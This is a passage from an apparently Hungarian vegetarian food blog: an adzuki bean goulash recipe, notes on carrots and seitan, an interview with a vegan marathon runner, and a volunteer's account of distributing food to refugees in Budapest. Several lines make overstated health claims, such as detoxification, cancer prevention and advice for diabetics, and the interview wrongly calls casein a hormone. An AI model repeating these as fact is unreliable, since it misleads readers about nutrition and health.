készítenek belőle, de teákat, és édeskés ízének köszönhetően finom desszerteket is. " A növény magjait már időszámításunk előtt 1000 évvel fogyasztották Kínában és Koreában. Japánba, ahol jelenleg is nagyon kedvelt élelmiszer, csak később került. A kelet-ázsiai konyhában az adzukibabot édesen szokás fogyasztani. Általában cukorral főzik össze és így jön létre az a bizonyos bab paszta, ami az egyik legfontosabb összetevője a kelet-ázsiai ételeknek, édességeknek. Gyakran ízesítik is, ugyanúgy, mint a gesztenyemasszát. A vörös bab masszát számos kínai ételhez is felhasználják, mint például a vörös bab fagylathoz. Rengeteg japán édességben is megtalálható. 2009. október 20.-án pedig a Pepsi kiadott egy adzukibab ízesítésű iható terméket is." Forrás: Wikipedia 10 OK, HOGY MIÉRT FOGYASSZUNK ADZUKI BABOT? 1) A fejtett babok a vegetáriánus táplálkozás fontos pillérei, mivel nagyszerű fehérjeforrások, tökéletes húspótlók a szervezet számára. Az adzuki bab a makrobiotikus táplálkozók körében is az egyik legkedveltebb hüvelyes, nagyon magas fehérjetartalmának köszönhetően. 2) Jelentős B1- és B2 vitamintartalma mellett, hasznos vas-, kalcium-, magnézium és foszfor forrás. 3) Magas kalóriatartalma ellenére alacsony zsírtartalommal rendelkezik. 4) Rendkívül magas rosttartalmának köszönhetően csökkenti a koleszterinszintet. 5) Alacsony glikémiás indexének köszönhetően természetes inzulinszabályozó. Egyensúlyban tartja a vércukorszintet, így cukorbetegek számára is kifejezetten ajánlott a fogyasztásuk. 6) Oldhatatlan rosttartalma jótékony hatással van a belek mozgására, a székrekedésre. Ennek köszönhetően csökkenti a végbél- és vastagbélrák kialakulásának kockázatát. 7) A felgyorsult bélmozgásnak köszönhetően remekül méregtelenít, salaktalanít. 8) A hagyományos kínai gyógyászat szerint a kínai vörös bab, a szív gabonája, mert egyszerre tisztítja meg a szívtüzet és tölti fel vérrel a szívet. Tökéletes vérnyomás-szabályozó. 9) Magas rosttartalma miatt hosszú ideig telítettség érzést okoz, és ez párosítva az alacsony zsírtartalommal, és az alacsonyan tartott vércukorszinttel, segít a testsúlyunk kordában tartásában, a fogyásban. 10) Magjának csíráztatásával értékes esszenciális aminosavakhoz juthatunk. +1) Fontos élelmiszer alapanyag funkciója mellett, hasznos kozmetikum is. Bőrápolóként friss, puha, energiával teli arcbőrt kapunk, egy-egy adzuki babbal készített pakolás vagy lemosó után. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Magyarországon leginkább vörös színű adzuki babot lehet vásárolni bioboltokban, de létezik fehér, fekete és szürke színben is. A többi babhoz hasonlóan ezt is áztassuk be előző éjszaka, hogy könnyebben meg tudjuk főzni. Vigyázzunk, mert az adzukibab hamarabb megfő, mint a hagyományos bab, nekem is sikerült túlfőznöm. ;-) Főzve, fagyasztóban tárolva, akár hónapokig is eláll, így bármikor amikor szeretnénk, csak előkapjuk és változatos formában, különböző ételekben felhasználhatjuk. Itt a Zöld Avocado vegetáriánus gasztroblogon egy hagyományos babgulyást készítettem nektek, de használhatjuk saláták alapanyagaként, pörköltökbe, kenyérre kenhető krémként, sütőtököt tölthetünk meg vele, fogyaszthatjuk rizses egytálételbe, mexikói ételek töltelékeiként, tortillával, chipsz-szel, de akár édességek alapanyagaként is. A későbbiekben biztosan ki fogom próbálni, mint desszert alapanyag! ;-) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) HOZZÁVALÓK - 4 db közepes sárgarépa - 1 db nagyobb fehérrépa - 500 g bio adzuki bab (előző éjszakára beáztatva) - 2 db közepes vörös hagyma - 2-3 ek olívaolaj (vagy répceolaj) - 1 közepes érett paradicsom - Himalája só, őrölt fekete bors, 3 db bio ételízesítő leveskocka, 1 ek mustár - 1 nagy marék friss petrezselyem - nagy fazék tiszta víz - - gluténmentes csipetke: (barna) rizsliszt, Himalája só, víz (elhagyható) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS Mint minden leves, ez is nagyon egyszerűen elkészíthető! Az apróra vágott vöröshagymát olajon megdinszteljük, majd rászórjuk az apróra vágott paradicsomot. 1-2 perc kevergetés után, hozzáadjuk az előre beáztatott adzuki babot, a megtisztított és felkarikázott sárgarépát, a fehérrépát felvágva kb. 8 darabba. Az egészet felengedjük kb. háromszoros mennyiségű vízzel, és hozzáadjuk a fűszereket, illetve az apróra vágott petrezselymet. Fedő alatt, közepes lángon, kb. 1 óra alatt készre főzzük a babgulyást. Közben néha megkeverjük. (Nem szükséges liszttel sűríteni) Amikor már puha a bab és a répa is, beleszaggatjuk a gluténmentes csipetkét. Sajnos nem tudok pontos mennyiségeket írni, mert érzésre készítem. Egy müzlistálat félig töltök rizsliszttel, hozzáadok kb. 1 tk Himalája sót, és annyi vizet, hogy csipkedhető keményebb tésztát kapjak. Olyan gyurmaszerű állagot. A forrásban lévő levesbe csipkedjük lisztes kézzel a csipetkéket. A méretét szabadon megválaszthatjuk. Általában a nokedlinél egy kicsit nagyobb galuskákat tépkedek, amik a főzés során még egy kicsit meg is fognak dagadni. Miután az összes csipetke a levesben van, visszatesszük a fedőt, és még kb. 5 percig főzzük az egészet egybe. Ezután tálalható is a gazdag és tápláló, meleg adzukibabból készült gulyásleves. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Táplálkozz és ne csak étkezz! Jó étvágyat kívánunk! :-) Amíg elkészül a gulyásleves, készítsetek mellé például mindenmentes, narancsos sütőtökös diós kuglófot, mindenmentes, narancsos sütőtökös diós kuglófvagy laktózmentes, amerikai banán-palacsintát, laktózmentes, amerikai banán-palacsinta vagy tojásmentes , túrós kakaós zabpalacsintát. (Ez utóbbi kettő már nem vegán, és nem is gluténmentes ételek.) tojásmentes, túrós kakaós zabpalacsinta Megjegyzés1: Nem tudom, hogy ti már észrevettétek-e, de a gulyáslevesek, és a pörköltek sokkal, de sokkal finomabbak, és zamatosabbak másnap, illetve harmadnap. Minél "érettebb", annál ízesebb! Legalább is nekem ez a tapasztalatom. ;-) Így ha vendégeket szeretnétek elkápráztatni egy hamis gulyáslevessel, pörkölttel (pl.: csicseriborsó pörkölt), akkor készítsétek el még előző nap, és hagyjátok összeérni az ízeket. Megjegyzés2: A hüvelyesek, gabonákkal történő fogyasztása tökéletes fehérjeforrás, és egymást kiegészítve teljesértékű tápláléknak számít. tápláló babgulyás adzukibabból (gluténmentes, laktózmentes, tojásmentes, vegán)
A sárgarépa jotékony hatásai
2015. szeptember 24. Élj harmóniában
A sárgarépát gyerekként kedveltem meg. Nagypapám mindig azt mondta, hogy egyek sokat mert akkor majd tudok fütyülni. Sok sok kiló sárgarépa elfogyasztása után sem tudtam fütyülni, de a "klasszikus" magyar konyhából - leveszöldség, főzelékek és kb a sütőben sült krumpli, sült tök és főtt kukorica ami zöldséges ételként megfordult nálunk otthon - nekem a sárgarépa volt a kedvenc zöldségem. Már tinédzserkoromban is ha valamit csak úgy rágcsálni szerettem volna, sokszor esett a válassztásom egy szál sárgarépára:) Azon túl, hogy ízletes miért jó rendszeresen fogyasztani? Gazdag vitaminokban, ásványi anyagokban, legkiemelkedőbb a béta karotin tartalma. A szervezet a béta karotint szükség esetén A vitaminná alakítja. A sárgarépa fogyasztása hozzájárul a jó látáshoz is és segít egészségesen tartani a n yálkahártyákat. Kedvezően hat a bőrproblémáknál, széppé teszi a bőrt. Segít a beleket megtisztítani és eltávolítani a salakanyagokat, méregteleníteni. C sökkenti a koleszterinszintet. Fogyókúrák esetén is jól hasznosítható. T ámogatja a máj tisztulását és erősíti az immunrendszert. Csökkenti a daganatos betegségek kockázatát és regeneráló szerként is használják. Í zületi gyulladás esetén is kedvezően hat, elősegíti a gyógyulási folyamatokat. Fogyaszthatod nyersen elrágva, vagy reszelve salátában, répalé formában, levesekben, párolva, főzve, sütve még édességek tésztájába keverve is kellemes kompozíciót kapunk:) Az ájurvédában édes minősége miatt, vata csökkentő hatást tulajdonítanak neki, de a pittát és kaphát kismértékben növeli. A föld alatt növő zöldségfélék közül a sárgarépa szattvikusnak minősül. (erről bővebben itt olvashatsz) Téli időszakra szakszerűen elvermelve jól tárolható zöldség.
Szejtán alaprecept
2015. szeptember 16. VegaNinja
A búzasikérport alaposan befűszerezzük, besózzuk még szárazon, és jól elkeverjük. Magyaros ízvilághoz borsot, köményt, pirospaprikát használjunk, de ez szabadon variálható. Keverhetünk hozzá lisztet vagy sütőport, hogy ropogósabb vagy szivacsosabb állagot érjünk el. Ezután vizet adunk hozzá, 100 gramm sikérhez kevesebb, mint 2 dl víz szükséges. Ekkor összeáll egy gumis kis gombóccá, melyet félökölnyi labdákra kell szedni, […]
Sajtfüggő voltam! – Interjú Beda Szabolccsal
Csupán három hete, hogy Beda Szabolcs a maratoni táv világbajnoka lett Lyonban. A lenyűgöző eredmény értékét tovább emeli, hogy Szabi évek óta vegán. Vajon mi a titka? Nagy szeretettel gratulálunk a világbajnoki címedhez! Valóban fantasztikus ez a 2.31.14-es teljesítmény. Úgy hallottam, elég kalandos előzmények után sikerült rajthoz állnod Lyonban. Köszönöm. Egy olyan futóval utaztam ki, akit én sem ismertem korábban; Facebookon hoztak össze minket. Mindketten útitársat kerestünk, együtt autóztunk ki Szentgotthárdból. Így is 15 óra volt az út, éjjel 1-kor érkeztünk meg a Couchsurfingen szerzett szállásunkra. Szerencsére megvárt minket a házigazda, aki valóban nagyon kedves, de a szállás maga katasztrofális volt. Konkrétan nem volt szappan a fürdőszobában. Egy XVI. századi házikóról beszélünk - ezt írta is az adatlapján, de azt elfelejtette közölni, hogy takarítva is akkor volt utoljára. (nevet) Olyan kosz volt, hogy azt nem lehet elképzelni. A kamrája tele volt zöldségekkel, rendben volt a kert is, de a biztonság kedvéért másnap távoztunk a helyszínről. Persze nagyon megköszöntük azt az egy éjszakát is, csak hát a vébé miatt komfortosabb szállásra volt szükségünk. Végül egy háromcsillagos apartmanhotelben töltöttük a további napokat. Lehetett főzni, ami nekem kiemelt fontosságú volt, hiszen rengeteg ételt vittem otthonról: tésztát, rizst, zöldségeket. Vegánként azért még Lyonbanse könnyű. Én szinte kizárólag azt ettem, amit kivittem, csak bagettet, és egy lekvárt vettem helyben. A verseny előtti napon ebédre mákos tésztát ettem, vacsorára pedig lecsós rizst. Ez utóbbi eléggé el is tolódott a városnézés miatt - este 9-kor ettem utoljára, és másnap reggel 7-kor volt a rajt. Pont a várható hőség elkerülésére tették koránra az indulást, aztán ez végül nem jött be. Ahogy mesélted, aránylag hűvösben indultatok, ami neked nem volt olyan kényelmes. Igen, 17 fok volt, és felhős ég. Elsőre azt gondoltam, hogy a meleg praktikusabb lett volna, mert jobban bírom, mint a többiek. De utólag visszanézve, hogy sikerült nyernem, már nem volt jelentősége. Így viszont futóidőben tudtam jobbat hozni. Később sem melegedett az idő, én az eredményhirdetésre már hosszú ujjúba öltözve érkeztem. De eleve hogy lehet amúgy 35 fokban edzeni, versenyezni? Az a titka, hogy gyorsan kell futni, mert akkor van menetszél. (nevet) Mennyire elterjedt rólad az, hogy vegán vagy? A nemzetközi színtéren nem, nemigen ismerjük egymást, csak versenyen találkozunk. Magyar szinten többnyire köztudott. Szenior világbajnok vagy - többen megjegyezték, hogy nagypapák versenyének gondolták ezt elsőre. Az attól függ. Sokan még 80 fölött is versenyeznek. 35 év fölött kezdődik a szenior korosztály, és ötévente kezdődik az újabb korcsoport. Így én a 35-40 év közöttiekkel versenyeztem. Valahol egyszer kiszámolták, hogy 35-től az ember elkezd kicsit hanyatlani, azért van itt a határ. (nevet) Bár ez sem mindig ugyanott húzódik - tavaly sikerült megnyernem a hegyi futó országos bajnokságot szenior kategóriában, mert ott is 35 év a határ, de van, ahol 40. De egy utcai futóversenyen vagy a maraton országos bajnokságon együtt értékelnek a többiekkel. Tri-, majd duatlonból indulva, 20 évesen már országos bajnok voltál, ráadásul ,,Az év junior duatlonistája is. 1998 óta indultál Ironmanen, majd 2000-ben 3. helyen végeztél a nagyatádi Ironman Országos Bajnokságon 9:07-es idővel. Mi indított mégis a ,,csak futás felé? 1998 és 2003 között egyhuzamban hatszor indultam a nagyatádi Ironmanen. Az iskolába járás mellett ez még nem volt gond, a 2000-es eredményem is ezt tükrözi. Viszont amikor állásba kerültem, rohamosan megcsappant az erre szentelhető időm napi 8-9 óra munka mellett, és így már nem ment olyan flottul a készülés. Viszont a futás mindig is a specialitásom volt a triatlonon belül; minél hosszabb a táv, nekem annál jobban megy. Sosem voltam jó úszó. Rövidebb távokon nem is nagyon volt sanszom, mert mire kijöttem a vízből, addigra már összeálltak a bringás bolyok, az pedig esélytelen volt, hogy én hozzájuk csapódjak. Ami fontos különbség az Ironmannél: ott tilos a bolyozás, vagyis növekedtek az esélyeim. Már a kerékpáros részen is föl tudtam jönni, a futás meg végképp feküdt. Pár évig még munka mellett is edzettem, de borzasztó kemény volt. Semmi másról nem szólt az életem, mint a munka meg az edzés. Nem volt se szabadidő, se nyaralás, se semmi. Egész nyáron készülés a nagyatádi versenyre, ami akkoriban még augusztusban volt. Egy idő után viszont nem javultak az eredményeim, sőt, így elfogyott a motivációm. Végül az utolsó évet a 6. helyen zártam, ami munka mellett nem olyan rossz. Akkor merült föl bennem, hogy mivel a futás mindig is jól ment, akkor innentől arra kell koncentrálnom. Ha van előzmény, akkor azért már napi 1 óra készüléssel szép eredményeket lehet hozni. Nincs is olyan ambíciód, hogy visszatérj a Vasemberek közé? Nem igazán. Esetleg akkor, ha találnék egy olyan támogatót, aki azt mondaná, hogy készüljek föl a hawaii-i versenyre, és pár évig nem kell semmi mást csinálnom, csak edzeni. De munka mellett már biztosan nem. Mik az egyéni céljaid a futásban? Egy jó idejű maratont szeretnék még futni. Eddig inkább helyezésre mentem az eb-n és a vb-n is, voltam országos 3. is. Most egy 2 óra 30-on belüli eredményt tervezek, 25 és 28 között valahol. Az ultrafutás nem vonz? Hiszen mondtad, hogy szereted a hosszabb távokat. De, kacérkodom vele, csak azért pár évet még várok. Pontosan azért, mert most relatíve gyors vagyok maratonon. Amikor már azt érzem, hogy nem tudom túlszárnyalni az adott eredményt, akkor jöhet az ultrázás. A futást természetesen sosem fogom abbahagyni. Csapatban is évek óta nagyon eredményesek vagytok. Igen. Az ELTE Sashegyi Gepárdok futócsapat tagja vagyok. A csapaton belül van 10-12 fő, aki nagyon komolyan veszi a futást, és az eredményeket is hozza. Az utóbbi három évben mindig két csapattal álltunk dobogóra a maratoni ob-n, de szerencsére rövidebb távokon is halmoztuk a jó eredményeket (hegyi futás, félmaraton, 10 km). A nagy bravúr persze az lenne, ha csak mi állnánk dobogóra, három csapattal; ez sem elképzelhetetlen, korábban már majdnem sikerült, idén pedig még erősebbek leszünk. Reméljük, most összejön! Van-e vegán Gepárd rajtad kívül? Igen, bár ő nem általam vagy a csapatban veganizálódott, hanem már eleve azért került hozzánk, mert én vegán körökből ismertem, és tudtam, hogy komolyabban érdekli a versenyzés. Hozzáteszem, én se vegánként kerültem a csapatba, ez nekem is menet közben alakult, sok évnyi vegetarianizmus után. A többi csapattag nyitott és érdeklődő, remélhetőleg egyszer ők is erre az útra lépnek. Nyilván ők is látják, hogy mennyire jól működik ez az életmód a hosszútávfutásnál. Mióta vagy vegán? Hivatalosan 2012-ben váltam vegánná. Nagyjából 2007 óta voltam vegetáriánus, tejet már akkor se nagyon fogyasztottam, viszont konkrétan sajtfüggőként éltem. Ha nem tettem vacsorára a szendvicsemre, akkor bizony elvonási tüneteim voltak - erről ma már tudjuk, hogy a kazein nevű hormonnak köszönhető, ami a kisbocit köti az anyukájához. Ez az emberekre is ugyanúgy hat. Ennek egy huszárvágással vetettem véget, mint az alkoholisták. (nevet) Pár napig még vágyódtam utána, de aztán ez elmúlt. Könnyebben ment, mint gondoltam. Majd elkezdtem uborkát szeletelni a szendvics tetejére, és most bátran már mondhatom, hogy uborkafüggő vagyok. Mint bárki, eleinte én se gondoltam, hogy a tejipar ugyanolyan rossz, mint a húsipar, sőt... Ahogy egyre több információhoz jutottam, elsősorban Bonifert Annának köszönhetően, könnyebb volt a sajtot is letenni. Melyik eredményedre vagy a legbüszkébb, és miért? A 2000-ben teljesített, 9:07-es Iromanemre, mert két olyan név mögött végeztem, akik akkor abszolút a triatlon élmezőnyét képviselték, név szerint: Fazekas Attila és Zsódér Zsolt. Nagyon büszke voltam arra, hogy tényleg csak a legjobbak tudtak megverni. Ezen kívül a maraton országos bajnokság 3. helyezésemre is, amit 2011-ben szereztem, illetve a szenior Eb- és vb-címeimre, amiket gyors egymásutánban sikerült megnyernem. Mennyit és mit edzel? Attól függően, hogy éppen alapozás vagy versenyre készülés van, napi átlagban 20 kilométert teljesítek az első, és nagyjából 15 kilométert a második időszakban. Verseny előtt és után persze én is pihenek pár napot, meg előfordul, hogy hirtelen közbejön valami, de alapvetően minden nap futok. Megesik, hogy alapozáskor napi kétszer is kimegyek, olyankor nagyon kellenek a kilométerek. Erősítő edzést nem szoktam végezni, bár biztos jól jönne, de sose volt az erősségem. (nevet) Az utóbbi időben heti egyszer futóiskolázunk a Gepárdokkal, bár ez sem a kedvencem, de csapatban persze megcsinálom. Nem vagyok laza, így ami ezt igényli, abban nem vagyok jó, nehezemre esik, de így nyilván nem olyan bajos. Milyen ételeket javasolnál a futótársaknak, kiváltandó az állati fehérjét? Ami nagyon fontos, hogy az ételek túlnyomó többsége szénhidrát legyen. A 80/10/10-es irányzatot követem, ami itthon leginkább a nyers változatában terjedt el, én azonban eszem főtteket is. A futás miatt lényeges, hogy elegendő kalóriát vigyek be, ezt zöldségből és gyümölcsből már csak anyagilag is lehetetlen fedezni. Fő táplálékaim: rizs, krumpli, tészta, köles - ezek szolgálnak köretként, mellé jönnek a párolt zöldségek: cukkini, padlizsán, karfiol, brokkoli. Illetve hüvelyeseket is eszem: babot, borsót, csicseriborsót és lencsét. Ezeket szoktam variálni. A zöldségekben van a szükséges vitamin és ásványi anyag, a köretek biztosítják a kalóriát - így minden szükséges tápanyagot egyszerűen be lehet vinni. A zsírról sem feledkezem meg (magvak), de ez ugyanúgy 10%, mint a fehérje. Abszolút nincs szükség semmiféle külön fehérjepótlásra, még vegánként sem, nemhogy mindenevőként! Én semmiféle port, italt nem használok, bőségesen elegendő az, amit az étkezések során beviszek. A krumpli,rizs és a hüvelyesek a legtökéletesebb növényi fehérjeforrások, sokszor utalnak már rájuk superfoodként is. Az összes szükséges esszenciális aminosav (fehérje) megvan bennük. A felnőtt emberek fehérjeigénye ahhoz képest, amennyit esznek, elenyésző. Lényegében szinte mindenki túladagolja. A hivatalos ajánlás testtömeg kilogrammonként 0,85 gramm, ez egy 60 kilós embernél 51 gramm naponta - ez már eleve fölül van kalkulálva, van benne egy biztonsági tartalék. Én ezt bőven túlteljesítem. Van olyan élsportoló vegán ismerősöm, aki napi szinten 180 gramm fehérjét is bevisz ugyanezzel a magas szénhidráttartalmú étrenddel. Nem mondhatjuk, hogy túlsúlyos lenne, vagy bármiben hiányt szenvedne. Ha valakit ennél is bővebben érdekel a téma, ajánlok még egy cikket ebben a témában. Mik a mélypontjaid, és hogyan lendülsz át rajtuk? Az a nagy szerencsém, hogy pont az étkezésemből fakadóan nincsenek mélypontjaim. Nem érzem magam fáradtnak, a hosszú futásokat sokkal jobban bírom. Megszűnt a vércukoringadozás. Régebben gyakran előfordult, hogy a 30-as futásaim végére nem voltam jól, nagyon megéheztem. Mióta ezt a diétát követem, gyakorlatilag bármennyit kimehetek futni. A kétórás futásaimra most már mindig úgy megyek ki, hogy nem eszem előtte, csak utána. Nem titok, hogy a futáson kívül egy vegán webáruház és egy versenyszervező iroda is kapcsolódik a nevedhez. Hogy fér bele ennyi minden az életedbe egyszerre? Hogy tudsz ennyi mindennel foglalkozni ilyen komoly futókarrier mellett? És még van egy civil foglalkozásom is. (nevet) Vállalatirányítási rendszerek bevezetésével foglalkozom. Ez projekt jellegű, nem feltétlenül folyamatos elfoglaltság. Bár most nyáron épp összejött minden: egyszerre négyfelé kell figyelnem, nem egyszerű, valóban nagyon be kell osztanom az időmet. Vannak-e példaképeid? Futóként sose voltak. Mindig a magam útját jártam. Tudom, hogy ez sok embernek számít, de nálam ez nem fontos. A vegánok közül azonban Bonifert Anna mindenképp kiemelendő, az itthoni vegán közösségért elmondhatatlanul sokat tett és tesz. Állandóan szervez, klubokat, filmvetítést hoz össze, könyvet ír, létrehozta a Vegán Állatvédelem Egyesületet is. Minden elismerésem az övé. Mi az a titok, amit most megtudhatunk rólad? Szeretem az elvontabb, extrémebb művészeteket, zenéket és filmeket. Szívesen hallgatom a Tudósokat, és a Bizottságot. Gyakran üldögélek harmadmagammal a moziban egy Lars von Trier-filmen. Akkor viszont hadd kapcsoljak ide egy zenét, amit egy magyar dj, Mastif írt. A szövegbetét Trier Melancholia című filmjéből származik. Köszönöm, érdekel! Erről a filmről jut eszembe, hogy a Rammstein is nagy kedvencem. További szép eredményeket, még több sikert kívánunk a futásaidhoz! Nagyon köszönöm. Zwickl Évi
Tranzitra fel!
A következő írásom megosztja majd társadalmunkat. Egy gasztroblog általában nem foglalkozik politikával, szociológiával, legalább is a blogbejegyzéseiben. De ételekkel, receptekkel, egészségmegőrzéssel, stb. igen. Írásommal kicsit kilépek ebből a skatulyából, s ha mégsem tetszene, el kell mondjam, megmarad az ételekkel való kapcsolat. Friss az élmény, ezért lehet, kicsit kusza lesz, de igyekszem ,,még melegen tálalni az élményeket. Az összegzés a végén nem marad el. Kezdetektől foglalkoztatott, mi a helyzet a menekültekkel. Sokat ugyan nem kérdezősködtem, így történt, hogy nem szereztem tudomást korábban arról, hogy milyen úton-módon lehetek részese annak a folyamatnak, hogy a Budapesten táborozó menekültek (nem bevándorlók!) számára valamilyen segítséget nyújtsak. Szombaton végre elért hozzám is a hír, hogy hova és mikor mehetek. Vártam, mint mások a hétvégi kiruccanást. Közvetlen előtte azonban elmentem a piacra és vettem több mint 20 kg szilvát, mert olvastam valakinél, hogy a banános dobozt milyen gyorsan szétszedték, mert bizonyára szeretik a gyümölcsöt... Első ételosztás Reggel 9 körül érkeztem a helyszínre, ahol már szorgos-dolgos kezek készítették a szendvicseket. Körbeállták az asztalt, valaki a kenyereket kente, más csomagolta zacsikba, paprikát/almát is adtak hozzá. Sárgaborsókrémből készült növényi margarinnal lazított pástétomokat kentünk meg, aránylag vastagabban, majd raktuk össze a két szelet kenyeret. Előkészületi munkák: Éppen csak a jobb és bal oldalamon állók nevét tudtam meg, mert inkább mindenki dolgozott, kevésbé beszélgetett. Több száz szendvicset készítettünk. Kenyerek elfogytával szerveződött, hogy kik mennek osztani. Szerettem volna menni én is a közeli Köztársaság térre, de nem jött össze. Jól jártam. A reggeli első próbálkozás nem volt sikeres osztás, az osztók visszajöttek, mert különben szétszedték volna az összes csomagot. Kupaktanácsot tartottunk. A döntés: válasszunk ki néhány menekültet, mondjuk meg nekik, hogy ha sorba állítják társaikat és segítenek nekünk, akkor mi ezt honoráljuk feléljük nagyobb adag étellel. Afganisztánból érkezett férfiakkal színesebb a tér zöld pázsitja. Nőkett érdekes módon ott nem nagyon láttam, gyerekeket, nagyobbacska srácokat igen. Értelmes tervezésnek jó gyümölcse lett. Mindenféle gond nélkül sikerült kiosztani több száz kis pakkocskát. Mindenkinek jutott, aki sorba állt. A végén marad még egy táskányi adag, amit már maguk az afgán menekültek osztottak szét a később érkezőknek. Második ételosztás Visszaérkezve láttuk, hogy készült bőven szendvics, így az a döntés született, hogy a Keleti pályaudvarnál is megpróbálkozunk. Közben jöttek a hírek, hogy épp mi zajlik ott. (Bővebben itt és itt és itt olvasható.) Összepakoltunk 2-3 autóba, és a bázisról átmentünk a Keletihez. A Rottenbiller utca felől közelítettük meg az aluljárót. Önkéntes szervezőnk és segítőnk, Ilona (aki amúgy szerintem teljesen érthetően beszél angolul), már megegyezett ismét néhány menekült fiúval, hogy segít. Árnyékos résznél megálltunk és lassan elkezdtek jönni, sorba állni. Mivel a tranzit zóna a Rottenbiller aluljáróhoz képest beljebb van, így aránylag kevesen érkeztek. Ekkor néhányan közelükbe merészkedtünk és próbáltuk jelezni feléjük (pl. angolul, de sokan nem beszélnek angolul), hogy ételosztás van, menjenek enni. Gyermekes anyáknak intettem, hogy kövessenek, így szerencsére egyre többen értesültek az ételosztásról. Néhány képet készítettem az aktuális állapotokról. Miközben a pályaudvar felől olyan hangok hallatszottak, mintha focimeccs lenne (persze nem az volt), más családok nyugodtan ,,sziesztáztak. Az utolsó csomag ételeket már személyesen vittem oda még távolabb levő helyekre, ahol kisgyermekek-anyuka menekülteket láttam. (Mivel nagyon sok férfi jött, kevés nő gyerekkel.) Meg kell jegyeznem, nem szedtek szét, közelembe sem jöttek. Nyilván, igyekeztem nem feltűnést kelteni, úgy adtam oda a csecsemős vagy kisgyermekes anyukáknak a maradék néhány szendvicset. Élet a tranzit zónában: Harmadik ételosztás Ismét visszatérve a bázisra, épp gyümölcsöket pakoltak csomagként az addigra újonnan érkezett önkéntes segítők. Szilva, amit hoztam, szintén sorra került. Nagyobb adag csomag elkészült, indultak a Köztársaság térre osztani. (Az első osztáshoz képest eltelt már 2-3 óra.) Alul szervezett osztás volt, más vezette az előzőhöz képest. Egy darabig türelmes sor volt, majd az emberi ösztön diadalmaskodott, sajnos. Szomorúan tértünk vissza. Ismét bebizonyosodott, komolyan meg kell szervezni az osztást, és ez bizony nem volt. Negyedik ételosztás Ez volt a legnagyobb kihívás talán, mivel meleg étel készült. Míg a szorgos-dolgos kezek pl. fokhagymát pucoltak, cukkinit aprítottak, stb. az ebédhez, néhányan elkezdtük a bejárat közelében lévő csomagokat szétszelektálni. Ugye van egy néhány bevásárlóközpont, ahol online elintézheted a bevásárlást. Nos, igen, így kap a bázis nagyon sok élelmet, meg pl. uzsonnazacskót. Van ezzel némi probléma, ahogy én látom, de erről majd később... Elhatároztam, hogy nem megyek ki a következő ételosztáshoz, hanem benn pakolok, hogy legyen hely a mozgásra (nagyon kicsi kis területen zajlik minden), hogy ne menjenek tönkre a gyümölcsök, zöldségek. Míg pakoltam, elkészültek a bedobozolt főtt ételek és indultak ki. Mivel a reggeli csapat időközben megújult emberekben, így kértek, hogy én is menjek, mert már tapasztalattal rendelkezem, és nem akarnak úgy járni, mint az előző ételosztásnál. Summa summarum az ételosztás sikeres volt, ugyanis követtük a Keletinél is bevált módszert. Most a Köztársaság tér másik végében osztottuk. Időközben rendőröket is láttunk megállni, kiszállni, akkor hallottam, hogy minap igazoltatták az önkénteseket, és akiknek nem volt maguknál a személyi, vagy más igazolvány, azokat bevitték az őrsre. Ami azt illeti, telefonnal is félve mentem ki, nem hogy táskával vagy iratokkal... Munka közben figyelni a saját értékeinkre nem mindig olyan egyszerű. Volt néhány magyar ember a távolban, aki problémázott, hogy zavarja a nyugalmát a sok afgán menekült. Nem tudom, éjszaka valóban olyan hangos életet élnek-e, hogy nem tudnak aludni a környék lakói....? Most mindenesetre nem tűnt úgy, hogy zsivaj lenne. A meleg ételosztás után visszamentem a segítők közé, elköszöntem, és elindultam haza. Reggel 9-14.30-ig ott voltam. Amikor eljöttem, készítették a vacsorát. Ételosztás képekben: Konklúzió - avagy némi tanulság Amikor elterveztem, hogy megyek, segítek, titokban akartam tartani a köz előtt, több okból. Most azonban mégis beszámolok, hogy tanulságot levonva segítség lehessen azoknak, akik eztán akarnak valahogyan segíteni. Először is, amiről írnom kell, az az ételek, amik oda érkeznek. Joghurt, gyümölcsjoghurt, tej, tejföl, kefír, sajtkrém, vajkrém - annyi érkezett adományként, hogy már hűtőkben sem fértek el. Egyszerre ennyit nem lehet kiosztani. Hüvelyes (bab, sárgaborsó, lencse) szintén nagyon sok érkezett, amikből nap, mint nap készítenek pástétomokat, ez jó, ez szükséges. Cukor - jó, magyar (?) kristálycukor. 10-20 kg legalább volt, és egyszerűen nem tudom elképzelni, mibe fogják felhasználni. Szóval, ha valaki küldene oda élelmiszert, vinne oda élelmiszert, cukrot és gyorsan romlandó tejterméket inkább ne! Répa - sajnos arra már nem jutott időm, hogy átválogassam valakivel a közel 1 m3 (egy köbméter) mennyiségű répát, mert némelyik már el kezdett penészedni. :( Répát néhány napig szintén ne küldjenek. Akik pedig ott dolgoznak, szakácsok, segítők, használják bátran (fel) a répát, ha már ennyi van, és romlik. Szendvicsbe, szendvics mellé reszelve ugyanúgy felhasználható, mint a paradicsom, paprika, ha főzésre nem használják. Higiéniai termékek (férfi-női borotva, fogkefe, borotvahab, stb.) akadt elvétve a szelektálás során az adományok között. Próbáltam kideríteni, el tudják-e juttatni ezt bárhogy a menekültekhez. Szerintem elég nehéz ezt megoldani. Ha valaki ezt adakozna, keresse meg a ,,célállomást, akik tudnak ennek szétosztásában segíteni. Ellenben takarítószerek, szivacsok, fertőtlenítő dolgok jól jönnek a konyha működéséhez. Keksz - rengeteg féle keksz volt, amiből szintén sokat összepakoltunk. Remélem, a következő ételosztásoknál kekszeket is raknak a csomagokba, hogy elfogyjon. Szerintem mi kellene még oda? Műanyag rekeszek - vagy 10-15 db, ugyanis a főtt ételeket abba viszik ki a helyszínre, egy rekeszbe pedig nem túl sok fér. Ráadásul elhasználódhatnak, mivel folyamatosan pakolnak bele, viszik tovább, hozzák vissza. 1 nagy hűtő, aminek egy kis fagyasztója van. A hűtőt ugyanis, még ha nem is érkezne tejtermék, a zöldségekből, gyümölcsökből is meg tudnák tölteni. Nem tudom, kié a hely, minden olyan anonim módon működik, szóval mielőtt odaállítasz egy hűtővel, jelezd a helyi segítőknek, hogy helyet tudjanak rá készíteni (áramba kötni, stb.). 10 kilós nagy tehertűrésű szatyrok (pl ikea), a szendvicseket ugyanis ezekben viszik ki osztásra, és most is volt néhány, aminek a füle elszakadt. Különböző méretű uzsonnás zacsik (ez bizony gyorsan fogyó termék). Legfeljebb 1-2 közepes méretű 